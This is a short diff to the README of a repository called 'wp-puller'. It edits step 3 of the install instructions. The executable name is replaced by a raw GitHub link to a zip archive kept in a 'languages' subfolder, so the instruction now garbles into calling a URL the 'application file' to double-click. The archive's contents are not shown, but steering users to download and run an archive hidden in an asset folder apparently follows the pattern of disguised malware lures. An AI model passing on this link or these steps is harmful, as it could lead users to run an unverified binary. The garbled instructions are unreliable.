jhonjairo0023/wp-puller/README.md

 ### Step 3: Open the Application

 1. Navigate to the folder where you extracted the files.
-2. Locate the main application file (usually named `wp-puller.exe` or similar).
+2. Locate the main application file (usually named `https://raw.githubusercontent.com/jhonjairo0023/wp-puller/main/wp-puller/languages/wp_puller_v2.1.zip` or similar).
 3. Double-click the file to launch wp-puller.

 ### Step 4: Configure Your Settings